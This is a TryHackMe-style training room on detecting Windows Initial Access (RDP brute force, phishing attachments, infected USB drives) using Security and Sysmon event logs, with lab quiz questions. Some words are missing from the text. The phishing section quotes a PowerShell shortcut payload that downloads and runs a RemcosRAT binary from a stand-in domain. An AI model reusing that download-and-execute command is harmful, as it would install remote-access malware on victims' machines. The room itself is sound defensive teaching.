To access material, start machines and answer questions login.
Now that you've learned about Windows logging in the Windows Logging for room, it's time to put that knowledge into action! This room guides you through common Initial Access and Discovery techniques and teaches how to detect each one using just Windows event logs, the most common log source for real-world teams.
Learning Objectives
- Explore how threat actors access and breach Windows machines
- Learn common Initial Access techniques via real-world examples
- Practice detecting every technique using Windows event logs
Prerequisites
- Complete the Windows Logging for room
- Understand the concept of tactics and techniques
- Know core Windows processes, especially the explorer.exe
- Be ready for a deep dive into Windows threat detection
Lab Access
Before moving forward, start the lab by clicking the Start Machine button below. The will open in split view and will need about 2 minutes to fully load. In case the is not visible, you can click the Show Split View button at the top of the page.
Set up your virtual environment
Credentials
Alternatively, you can access the from your own -connected machine with the credentials below:
Let's begin!
Initial Access
Before moving on, let's recap the concept of Initial Access. Imagine the cyber world as a big city filled with skyscrapers and tiny apartments - each one protected by its own front door. Now imagine threat actors as criminals roaming the streets at night. Some of them pick the lock of a specific office for weeks. Others smash at doors with brute force. And some just try every city door until they find one left open by mistake.
No matter what the final goal is, the first step of a threat actor is to get through the front door, and the moment an attacker successfully gets in is known as Initial Access. In this room, you will explore various Initial Access methods, but for now, let's divide them into two groups: those requiring an exposed service and those relying on human interaction.
Exposed Services
Putting a Windows server directly on the Internet is a common task for IT teams - corporate websites require an open port to show content, a mail server can't handle emails without an active port, and IT admins need to manage the machine remotely. However, every exposed service introduces major security risks. Within minutes, your exposed system can be scanned by automated bots looking for open ports, weak passwords, or unpatched vulnerabilities. And if something is not protected enough, threat actors will use their chance, as proven by these techniques:
- T1133 / External Remote Services (opens in new tab): Threat actors will look for exposed /VNC/ with weak passwords to get remote access to the machine
- T1190 / Exploit Public-Facing Application (opens in new tab): Threat actors will look for misconfigured or vulnerable websites and applications
User-Driven Methods
But how can the laptop be infected if it is not Internet-exposed? Indeed, unless you help the threat actors yourself, it is very hard to infect your laptop. However, people often help threat actors by clicking on malicious links, launching attachments, using pirated software, picking up unknown USB devices, and so on. And since humans are still the weakest link in cyber security and Windows is the most popular for user workstations, you are very likely to handle user-driven Windows Initial Access alerts frequently. The methods are covered by these techniques:
- T1566 / (opens in new tab): Threat actors employ different techniques, tricking users into launching the malware themselves
- T1091 / Removable Media (opens in new tab): Threat actors infect a USB device and hope that users will use the USB on multiple PCs
Usage by Threat Actors
Some Initial Access methods are getting popular, and others are declining, and there are many great threat reports on modern Initial Access tendencies (e.g. Mandiant M-Trends 2025 (opens in new tab)). Nevertheless, as a analyst, you should know that threat actors will use every chance to breach the target. For example, major ransomware groups like Medusa (opens in new tab) or Akira (opens in new tab)used all described techniques at least once in their campaigns.
Which MITRE technique ID describes Initial Access via a vulnerable mail server?
Which Initial Access method relies on a user opening a malicious email attachment?
Risks of Exposed
As a analyst, you should know that if you expose to the world and set a "12345678" password, your host will be breached within a few days. However, not everyone understands the security risks of an exposed . According to Censys Search (opens in new tab), there are over 5,000,000 -enabled machines right now, and many of them are already under threat actors' control. The problem is so widespread that defenders often call the Ransomware Deployment Protocol, emphasizing how often an breach directly results in a ransomware attack.
Detecting Breach
In our scenario, the IT admin exposed on a production server so that it could be accessed from home on weekends. The credentials were set to Administrator:Summer2025. Let's reconstruct what happened next, just in a few hours, and try to detect it in logs by using Event Viewer (C:\Users\Desktop\Administrator\Practice\ Case\-Security. file):
| # | Step of Attack | Detection Opportunity |
|---|---|---|
| 1 | Network Scan Botnet scans our IP and detects an exposed port |
N/A. Network attacks are out of the room scope |
| 2 | Brute Force Botnet starts a brute force of common user names (Administrator, admin, support, etc.) |
1. Open Security logs and filter for the failed logins (event ID 4625) 2. Filter for logon types 3 and 10, meaning remote logons 3. Filter for logins from external (use "Source IP" field) 4. That's it. You have detected a potential brute force |
| 3 | Initial Access via After around 100 attempts, the botnet guesses the correct password and enters the system |
1. Continue with the list from the previous step 2. Switch the event ID filter to 4624 (successful logins) 3. Check the account under which the logon was made 4. Now you know which account was used for the Initial Access |
| 4 | Further Malicious Actions Two hours after the breach, the threat actor logs in via and reviews the Desktop |
1. Continue with the list from the previous step 2. Filter for logon type 10, indicating interactive login 3. Copy the "Logon ID" field from the logon event 4. Open logs and search events with the same "Logon ID" 5. You will see all processes started by the threat actor via |
Logging Brute Force
Interestingly, it is not that hard to spot an exposed just from the Security logs. If you would assign a public IP to your server, disable the , enable , and wait around an hour - you would see the logs just like on the screenshot. Botnets around the world will immediately start brute forcing your server, generating hundreds of 4625 events that you won't miss! Note, however, that can be breached without a brute force if threat actors knew the credentials in advance (opens in new tab), but that is a topic for another room.

For this task, open the and analyze the logs of the breach scenario:
C:\Users\Administrator\Desktop\Practice\ Case\-Security.
Which user seems to be most actively brute-forced by botnets?
Which IP managed to breach the host via RDP (Logon Type 10)?
Can you get the real Workstation Name (hostname) of the threat actor?
Current State of
attacks are still a major threat as they can't be mitigated as easily as blocking access. If users have access to the Internet, they will eventually bring malware to their laptops, bypassing the entirely. According to the HoxHunt Trends Report for 2025 (opens in new tab), attacks have increased 41 times since the release of ChatGPT in 2022. Even more, the success rate of these campaigns remains high, meaning users are still falling for them. In this task, we'll focus on two techniques that lead to Windows breaches: malicious binaries and attachments.
Binary Attachments
In Windows, there are lots (opens in new tab) of executable extensions, and while most people know not to open untrusted .exe files, they are usually less cautious about .com, .scr, or .cpl files. However, all of them can contain the malware inside. For example, users are very likely to open the attached "tryhatme.com" file name assuming it to be a link to a meeting invite, not a malicious binary.
To make it worse, Windows hides known file extensions by default, meaning that the file "program.exe" will be shown to you just as "program". Threat actors often abuse it (opens in new tab) by naming their viruses like "invoice.pdf.exe" or "cat.png.com" and changing the icons to fit the topic. See the screenshots below to understand how the malicious file looks for the common user:
| Known Extensions Hidden by Default (invoice.pdf.exe) |
.COM Malware Shines if Extensions Are Shown (tryhatme.com) |
|---|---|
![]() |
![]() |
Attachments
To avoid detection, threat actors may prefer attaching , Visual Basic, or BAT scripts over binaries. A popular way to make the scripts look trustworthy is to hide them behind shortcuts - the same files you have on your Desktop that point to real executables somewhere in the Program Files folder.
Imagine receiving an email from a local PC store announcing major discounts and asking you to review the details in an attached archive. As in the screenshot below, the Discounts.zip contains two files: a PDF and a shortcut to the website. You carefully analyze the PDF and see that it is just a poster with the latest discounts. Engaged by the news, you rush to open the shortcut, only to find out that it points to a command instead of the legitimate website.
| With Payload (Visit Our Website!.) |
|---|
![]() |
Threat actors can include any command inside the "Target" field, as well as set any shortcut icon. You can verify it by right-clicking the file, selecting "Properties", and viewing the "Shortcut" tab. The case shown above, for example, downloads and executes a simplified version of RemcosRAT - malware used in many attacks on major companies and government agencies. The terminal below shows a full payload:
powershell.exe -c ...
# Download the encoded malware
(New-object System.Net.WebClient).DownloadFile('https://breacheddomain.thm/FILTERED/r.exe','C:\\ProgramData\\r.exe');
# Run the malware (RemcosRAT)
start C:\\ProgramData\\r.exe;
In this task, you will investigate three attachment examples stored in:
C:\Users\Administrator\Desktop\Practice\ Case 1-3
Let's play the role of the untrained user and mindlessly open the COM file.
Run the www.skype.com file from the Phishing Case 1 folder, which flag do you get?
Continue with the second attachment from the Phishing Case 2 folder.
From which URL does the malicious LNK download the next stage malware?
Finally, move on to the Phishing Case 3 folder and review its content.
What is the name of the double-extension file you see there?
Detecting Malicious Download
It is relatively simple to hunt for malicious downloads if you know how the victim sees it. First, the user uses a web browser or desktop application to open a attachment. In the simplest case, it would be a direct .exe malware download, but you are far more likely to see an archive attachment like .zip or .rar containing the malware. In this case, can greatly help you detect every attack stage:
# 1. Sysmon Event ID 1: Web browser is launched
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
ParentImage: C:\Windows\Explorer.EXE
# 2. Sysmon Event ID 11: A file (usually archive) appears in Downloads
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetFilename: C:\Users\User\Downloads\invoice.zip*
# 3. Sysmon Event ID 11: Optionally, the user unarchives files to some folder
Image: C:\Windows\Explorer.EXE (or C:\Program Files\7-Zip\7zG.exe)
TargetFilename: C:\Users\User\Downloads\invoice.pdf.exe
# 4. Sysmon Event ID 1: The user double-clicks the unarchived file
Image: C:\Users\User\Downloads\invoice.pdf.exe
ParentImage: C:\Windows\Explorer.EXE
Notes on Attachments
Unlike with binary attachments, files have a very interesting and important capability - they leave little execution trace. Consider the case on the screenshot below, where a user downloaded file that looks like a Google Chrome shortcut, but in fact runs some payload.
After the user launches the shortcut - Windows Explorer reads the "Target" field of the and makes it look like explorer.exe launches directly. Still, you can identify if it was indeed or another attack vector by looking for the preceding file creation events - files must have appeared somewhere in Downloads before:

In this task, let's try to investigate the third case by checking the attached logs:
C:\Users\Administrator\Desktop\Practice\ Case 3\-.
Which file did the user download via the web browser?
In which folder did the user unarchive the suspicious file?
What is the process ID of the launched phishing malware?
Finally, which malicious domain did the malware try to connect to?
Risks of Removable Media
Although some may believe that days of infected USB flash drives are long gone and cloud services have replaced them completely, threat actors will disagree, as proven by Camaro Dragon (opens in new tab) or Raspberry Robin (opens in new tab) attacks. Moreover, Initial Access via an infected USB bypasses firewalls, much like , and can start the attack chain even without Internet access and continue spreading without user interaction.
USB Delivery Case
Imagine working for TryHatMe Inc. and receiving a delivery package with a fancy hat and a USB labelled as "A gift from HR". You plug it in, a harmless GIF pops up, and you call HR to thank them for the present. But while the HR figures out what you meant, the malware from the USB has already spread to your laptop. (Real-World Case (opens in new tab))
Print Service Case
Another common scenario involves third-party entities like a print service. Suppose you visit one and hand over your USB to print a document. Their system, already infected with a worm, passes the malware onto your flash drive. Then, you bring the malware back to your home PC, and the infection chain continues. Now, let's learn how to detect this before it's too late! (Real-World Story (opens in new tab))
Detecting an Infected USB
Although there are many advanced techniques on how to run the malware from USB automatically as soon as the flash drive is plugged in, the majority of cases occur just because the user launches malware themselves. For example:
- Malware hides all legitimate files on USB and creates a malicious "RECOVERY." file
- Malware creates a "Photos.exe" binary and sets its icon to look like a simple folder
- Malware creates double-extension copies of all files, like "photo_2024_1_12.jpg.exe"
Interestingly, the detection of Initial Access via USB looks very similar to the attachments. Since both methods rely on a user running malicious binary via a graphical interface (explorer.exe), you may have a hard time understanding how exactly the attack started. Still, in some cases, you may find evidence of execution from external drives like "E:\malware.exe":
For this task, you will investigate a typical attack chain via USB using the attached logs:
C:\Users\Administrator\Desktop\Practice\USB Case\USB-.
Which USB file was launched by the user?
Which suspicious file did the malware drop to the disk?
(Format: full path to the file, e.g. C:\file.txt)
To which other USB did the malware propagate?
(Format: just the letter, e.g. X:)
Great job completing the room! Knowing the common Initial Access methods helps prevent them, and your acquired knowledge of detecting attacks in their first stages will be invaluable for quick alert triage and timely incident response.
Key Takeaways
- The two most common Windows Initial Access methods are exposed services and user-driven attacks
- Initial Access via can be easily detected using default authentication logs (4624/4625)
- User-driven attacks are best detected by process execution events, preferably ones
- Each Initial Access method (like ) has unique features that you will learn through practice
I am ready to move on!
Ready to learn Cyber Security?
TryHackMe provides free online cyber security training to secure jobs & upskill through a fun, interactive learning environment.
Already have an account? Log in


